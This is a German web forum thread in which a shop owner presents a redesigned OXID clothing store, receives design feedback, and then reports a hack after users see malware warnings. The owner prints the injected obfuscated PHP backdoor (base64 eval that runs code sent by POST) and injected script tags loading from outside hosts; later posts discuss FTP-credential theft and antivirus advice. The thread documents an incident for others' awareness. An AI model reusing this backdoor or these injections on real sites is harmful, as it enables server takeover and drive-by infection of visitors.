CatwalkAvenue.de

Seit einiger Zeit betreiben wir einen Bekleidungs-Shop (CE Version). Die Templates haben wir komplett restrukturiert und an unsere Bedürfnisse angepasst. Vom Standard-Template ist nichts mehr übrig geblieben. :wink:

—> [B]www.catwalkavenue.de[/B]

Wäre schön eure Meinung dazu zu hören. :rolleyes:

lg plexus

[QUOTE=plexus;26111]Seit einiger Zeit betreiben wir einen Bekleidungs-Shop (CE Version). Die Templates haben wir komplett restrukturiert und an unsere Bedürfnisse angepasst. Vom Standard-Template ist nichts mehr übrig geblieben. :wink:

—> www.catwalkavenue.de

Wäre schön eure Meinung dazu zu hören. :rolleyes:

lg plexus[/QUOTE]
In der Tat, ist sehr anders, als der 08/15-OXID-Shop…

Meine Farbe ist das Lila zwar nicht, aber das ist ja bekanntlich Geschmackssache…

Aber die technische Umsetzung und die Eigenständigkeit finde ich sehr gelungen…

Wie lange habt ihr dazu gebraucht?

Das solltest Du Dir aber auf jeden Fall “verkneifen”…

In den unvermeidlichen Serverstatistiken werden automatisch Daten gespeichert, die Dein Browser an uns übermittelt. Dies sind:

* Browsertyp/ -version
* verwendetes Betriebssystem
* Referrer URL (die zuvor besuchte Seite)
[B]* Hostname des zugreifenden Rechners (IP Adresse)
 [/B]* Uhrzeit der Serveranfrage. 

Das ist ein ganz heikles Thema derzeit…

(Zumindest sollte man nicht schreiben, dass man es tut, wenn man es tut :D)

Dein Shop wurde doch schon mal vorgestellt oder irre ich mich da?

Ich hätte sonst nur 2 Anmerkungen:

  1. Mir fehlen auf dieser Seite grundlegende Infos, was das eigentlich sein soll:
    http://www.catwalkavenue.de/sammelbesteller/

  2. Die Person auf dem Banner zu Anfang der Startseite.
    Ist das ein Mann oder eine Frau?
    Mein erster Gedanke war: Uhh, sieh mal ne Dragqueen?!." :eek:
    http://www.catwalkavenue.de/out/catwalkavenue/img/gutschein.jpg

Das Frau/Mann sieht aus wie Lorenzo oder wie diese Transe jetzt heisst.

[QUOTE=nolegend;26198]Das Frau/Mann sieht aus wie Lorenzo oder wie diese Transe jetzt heisst.[/QUOTE]

Und sowas findest Du gut Stefan, gell :smiley:

Gruß

@Marco komm du mir nach Weilburg :stuck_out_tongue:

[QUOTE=avenger;26166]In der Tat, ist sehr anders, als der 08/15-OXID-Shop…

Meine Farbe ist das Lila zwar nicht, aber das ist ja bekanntlich Geschmackssache…

Aber die technische Umsetzung und die Eigenständigkeit finde ich sehr gelungen…[/QUOTE]

Vielen Dank für deine Lobeshymne. :smiley:

[QUOTE=avenger;26166]Wie lange habt ihr dazu gebraucht?[/QUOTE]

Schwer zu sagen, da wir ständig an unserem Shop weiterarbeiten. Die Template- und CSS Dateien anzupassen hat jedenfalls mehrere Wochen gedauert. Zudem haben wir den Shop um einige zusätzliche Funktionen erweitert, was auch sehr viel Zeit in Anspruch genommen hat.

[QUOTE=avenger;26166]Das solltest Du Dir aber auf jeden Fall “verkneifen”…[/QUOTE]

Wovon redest Du??? :D:D:D:D:D:p

[QUOTE=ChristophH;26171]
Mir fehlen auf dieser Seite grundlegende Infos, was das eigentlich sein soll:
http://www.catwalkavenue.de/sammelbesteller/
[/QUOTE]

Nähere Infos dazu kommen bald. :wink:

[QUOTE=ChristophH;26171]Die Person auf dem Banner zu Anfang der Startseite.
Ist das ein Mann oder eine Frau?
Mein erster Gedanke war: Uhh, sieh mal ne Dragqueen?!." :eek:
http://www.catwalkavenue.de/out/catwalkavenue/img/gutschein.jpg[/QUOTE]

Der Banner wurde bereits schon wieder geändert und zu eurer Info. Ja es handelt sich um eine Frau und nicht um Lorenzo, auch wenn einige von euch anscheinend darauf stehen! :stuck_out_tongue:

@plexus: sieht aus als hättest du grade ein kleines crackerproblem, mein browser (google chrome) meldet grade das malware auf deiner seite eingebunden ist.

also:

ACHTUNG: bitte vorerst nichtmehr auf catwalkavenue.de gehen bis der threadersteller gemeldet hat das die seite wieder sauber ist, und alle die in den letzten x stunden vor diesem post hier drauf waren sollten doch bitte ihren rechner mit nem gescheiten Antivirenprogramm scannen.

[QUOTE=csimon;26531]@plexus: sieht aus als hättest du grade ein kleines hackerproblem, mein browser (google chrome) meldet grade das malware auf deiner seite eingebunden ist.[/QUOTE]
Bin gerade mal mit FF drauf.
Der selbst zeigt nichts an aber Kaspersky meckert.
Irgendwas mit atw_statistik.js

also bei mir hat google chrome die seite an sich geladen, aber irgendwas polnisches wurd da versucht nachzuladen, weswegen er sofort gesperrt hat. lustig, da ist firefox wohl der unsicherere von beiden :wink:

gdata hat bei mir nicht angeschlagen, allerdings nur weil chrome die dateien garnicht geladen hat.

aber plexus hat da scheinbar schon maßnahmen ergriffen :slight_smile: viel erfolg!

[QUOTE=csimon;26559]aber plexus hat da scheinbar schon maßnahmen ergriffen :slight_smile: viel erfolg![/QUOTE]

Danke. In der Tat sind wir Opfer eines Hackerangriffs geworden. Betroffen waren über 600 Dateien des Shops. Da es uns jedoch gelungen ist, alle Dateien wiederherzustellen, kann man nun wieder sicher auf unserer Seite surfen.

lg plexus

[QUOTE=plexus;26585]Danke. In der Tat sind wir Opfer eines Hackerangriffs geworden. Betroffen waren über 600 Dateien des Shops. Da es uns jedoch gelungen ist, alle Dateien wiederherzustellen, kann man nun wieder sicher auf unserer Seite surfen.

lg plexus[/QUOTE]
Gibt es dazu etwas mehr Info?

[QUOTE=plexus;26585]Da es uns jedoch gelungen ist, alle Dateien wiederherzustellen, kann man nun wieder sicher auf unserer Seite surfen.
lg plexus[/QUOTE]

Das würde ich nochmal gegenprüfen. So findet man in der Datei:

out/catwalkavenue/src/js/atw_statistik.js

immer noch diesen Code-Snipsel:

document.write('<script src=http://pecsa.com.pl/en/organizacja.php ><\/script>');

Ich denke nicht, das der dazugehört.

[QUOTE=avenger;26586]Gibt es dazu etwas mehr Info?[/QUOTE]

In knapp 200 Files wurde der folgende verschlüsselte Code jeweils an den Anfang der Datei eingefügt…

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ2sxeicpKXtmdW5jdGlvbiBnazF6KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJ4dmRtVnVZVzEzYjI0dWEzSXZhSFJ0YkY5d1lYUm9MM0p2WW05MGMzY3VjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gZ2sxejIoJGEsJGIsJGMsJGQpe2dsb2JhbCRnazF6MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkZ2sxejEpKWNhbGxfdXNlcl9mdW5jKCRnazF6MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZ2sxeicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2drMXonKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZ2sxemw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2drMXoyJykpIT0nZ2sxejInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

Betroffen waren vorallem Dateien in denen die Wörter [B]db[/B] und [B]config[/B] vorkamen. In den Verzeichnissen in denen Bild-Dateien enthalten sind, fanden wir jeweils eine Datei mit dem Namen [B]gifimg.php[/B] in dem dieser verschlüsselte Code ebenfalls stand.

Ausserdem entdeckten wir in zahlreichen Dateien am Ende (ca. 500 - 600 Stck.) die folgenden Aufrufe…

<script src=http://lovenamwon.kr/html_path/robotsw.php ></script>
<script src=http://pecsa.com.pl/en/organizacja.php ></script>

[QUOTE=ChristophH;26587]Das würde ich nochmal gegenprüfen. So findet man in der Datei:

out/catwalkavenue/src/js/atw_statistik.js

immer noch diesen Code-Snipsel:

document.write('<script src=http://pecsa.com.pl/en/organizacja.php ><\/script>');

Ich denke nicht, das der dazugehört.[/QUOTE]

Die Datei ist sauber, kann es sein dass du sie noch in deinem Cache zwischengespeichert hast und sie von dort aufgerufen wird?

Jupp, da hat mich der Cache meines Browsers getäuscht!

Sorry für den Fehlalarm!

[QUOTE=ChristophH;26591]Jupp, da hat mich der Cache meines Browsers getäuscht!

Sorry für den Fehlalarm![/QUOTE]

Macht nichts. :wink:

Hi,

ich möchte hier nicht in Wunden rumpieksen - aber wie kann es denn zu so etwas kommen?
Braucht man dazu nicht Schreibzugriff auf die Dateien und damit FTP-Zugang?

Ich hab so etwas ähnliches schon mal bei einer Freundin gesehen. Hier wurde durch einen Trojaner auf ihrem Rechner die cmd.ini (Konfigurationsdatei für Total Commander) ausgelesen, in der die Passwörter für sämtliche FTP-Zugänge unverschlüsselt abgelegt waren…

Gruß

[QUOTE=Marco Steinhaeuser;26593]Hi,

ich möchte hier nicht in Wunden rumpieksen - aber wie kann es denn zu so etwas kommen?
Braucht man dazu nicht Schreibzugriff auf die Dateien und damit FTP-Zugang?

Ich hab so etwas ähnliches schon mal bei einer Freundin gesehen. Hier wurde durch einen Trojaner auf ihrem Rechner die cmd.ini (Konfigurationsdatei für Total Commander) ausgelesen, in der die Passwörter für sämtliche FTP-Zugänge unverschlüsselt abgelegt waren…

Gruß[/QUOTE]

Gute Frage. Bisher konnten wir noch nicht feststellen wie es dazu kommen konnte. Wir haben unseren Webhoster bereits informiert und nun wird nach möglichen Sicherheitslücken gesucht.

Ich tippe mal einer von euch hat sich einen trojaner eingefangen. die lesen gezielt gespeicherte ftp passwörter von browsern oder programmen wie total commander aus.

dann wenige minuten oder stunden später werden die daten genutzt um das javascript da in die dateien zu schreiben, dabei sind die oft sehr dumm und zerhauen wenn man glück hat einfach nur den shop. in deinem fall sind die wohl leider nicht so dumm gewesen.

sowas nennt sich “drive by” infektion, du gehst dann auf eine gehackte (harmlose) seite, die ein bösartiges javascript oder flash enthält. grad flash ist browserübergreifend ein riesiges sicherheitsloch, da kommen ständig neue updates raus die dicke sicherheitslücken stopfen. da nutzt es auch nix nicht den ie zu verwenden.

dagegen schützt dich effektiv ein gutes antivirenprogramm, oder eben wie in meinem fall grade der safe browsing cache von google. ich nutz da selbst gdata 2010, welches jedes file was auf den rechner kommt erstmal scannt. das macht den browser halt minimal langsamer, aber dafür kann mir dann sowas schwer passieren.

Das ist letztes jahr auch vermehrt bei kunden von uns aufgetreten:

http://topconcepts.wordpress.com/2009/08/07/ftp-passworter-fur-online-shops-geandert/

Richtig effektiv schützt aber nur vorsicht. Selbst wenn sich jetzt der ein oder andere denkt “Ich habe ja einen Mac, mir kann nichts passieren”, liegt er da falsch. Die allermeisten mac user haben kein antivirenprogramm, obwohl es nachweislich viren und trojaner für macs gibt. diese sind auch weiterhin im kommen, allerdings bemerken viele die infektion garnicht weil sie kein antivirenprogramm haben. Auch Mac OS kennt flash, und bei den meisten “Hacking Contests” wird der mac traditionell über flash oder acrobat sicherheitslücken geknackt.

Und wer Windows XP nutzt, dem sei stark ein umstieg auf 7 ans herz gelegt. da gibts wie schon bei vista schutzmaßnahmen wie die DEP (Data Execution Prevention) die die ausführung von Schadcode gezielt verhindert und dazu noch die Adress Layout Randomization die verhindert das zb pufferüberläufe ausgenutzt werden können. Dazu surft man unter den neuen Windows Version auch als Admin nicht als admin und es ist schwieriger für programme sich unbemerkt zu installieren.

@plexus: ich würd dir vorschlagen du scannst erstmal deinen rechner und machst ihn falls was gefunden wird pauschal mal platt. Das ist die einzig wirklich sichere methode viren los zu werden.